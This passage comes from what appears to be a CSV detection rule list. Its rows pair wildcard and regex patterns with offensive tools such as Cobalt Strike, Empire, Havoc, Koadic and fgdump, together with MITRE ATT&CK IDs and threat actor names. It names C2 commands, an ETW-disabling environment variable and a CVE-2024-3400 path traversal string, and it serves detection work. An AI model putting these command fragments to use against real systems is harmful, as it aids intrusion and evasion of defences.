comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ServiceHavoc.exe",".{0,1000}ServiceHavoc\.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*servicemove*hid.dll*",".{0,1000}servicemove.{0,1000}hid\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 
- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*serviceName = *""KrbSCM""",".{0,1000}serviceName\s\=\s.{0,1000}\""KrbSCM\""","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*ServiceName*CorpVPN*",".{0,1000}ServiceName.{0,1000}CorpVPN.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*ServiceName'>KrbSCM*",".{0,1000}ServiceName\'\>KrbSCM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","servicename","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*services/p2p.Handle(): Wrote SMB fragment 
*",".{0,1000}services\/p2p\.Handle\(\)\:\sWrote\sSMB\sfragment\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*servpw.exe*",".{0,1000}servpw\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*servpw64.exe*",".{0,1000}servpw64\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SESSID=../../../../*",".{0,1000}SESSID\=\.\.\/\.\.\/\.\.\/\.\.\/.{0,1000}","offensive_tool_keyword","POC","CVE-2024-3400 exploitation attempt","T1210.001 - T1068 - T1190","TA0001 - TA0002","N/A","N/A","Network Exploitation Tools","https://x.com/HackingLZ/status/1780239802496864474","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*SessionGopher*",".{0,1000}SessionGopher.{0,1000}","offensive_tool_keyword","SessionGopher","SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It has WMI functionality built in so it can be run remotely. 
Its best use case is to identify systems that may connect to Unix systems. jump boxes. or point-of-sale terminals.","T1081 - T1087 - T1119","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","1159","166","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z" "*SessionGopher.ps1*",".{0,1000}SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*set * virus_scanner*",".{0,1000}set\s.{0,1000}\svirus_scanner.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*set AutoRunScript multi_console_command -rc /root/*.rc*",".{0,1000}set\sAutoRunScript\smulti_console_command\s\-rc\s\/root\/.{0,1000}\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*set CertPath data/*",".{0,1000}set\sCertPath\sdata\/.{0,1000}","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - 
MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*set CollectionMethodAll*",".{0,1000}set\sCollectionMethodAll.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*set 
COMPlus_ETWEnabled=0*",".{0,1000}set\sCOMPlus_ETWEnabled\=0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*set havoc *",".{0,1000}set\shavoc\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*set hosts_stage*",".{0,1000}set\shosts_stage.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*set keylogger*",".{0,1000}set\skeylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*set LFILE /*",".{0,1000}set\sLFILE\s\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Set Listener dbx*",".{0,1000}Set\sListener\sdbx.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*set Listener onedrive*",".{0,1000}set\sListener\sonedrive.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation 
framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*set obfuscate *",".{0,1000}set\sobfuscate\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*set payload *",".{0,1000}set\spayload\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*set PAYLOAD *",".{0,1000}set\sPAYLOAD\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*set pipename *",".{0,1000}set\spipename\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*set Profile apt1.profile*",".{0,1000}set\sProfile\sapt1\.profile.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - 
T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*set shellcode *",".{0,1000}set\sshellcode\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*set smartinject*",".{0,1000}set\ssmartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*Set the correct channel name using """"pscmdchannel"""" command*",".{0,1000}Set\sthe\scorrect\schannel\sname\susing\s\""pscmdchannel\""\scommand.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - 
T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*set userwx*",".{0,1000}set\suserwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*set zombie *",".{0,1000}set\szombie\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
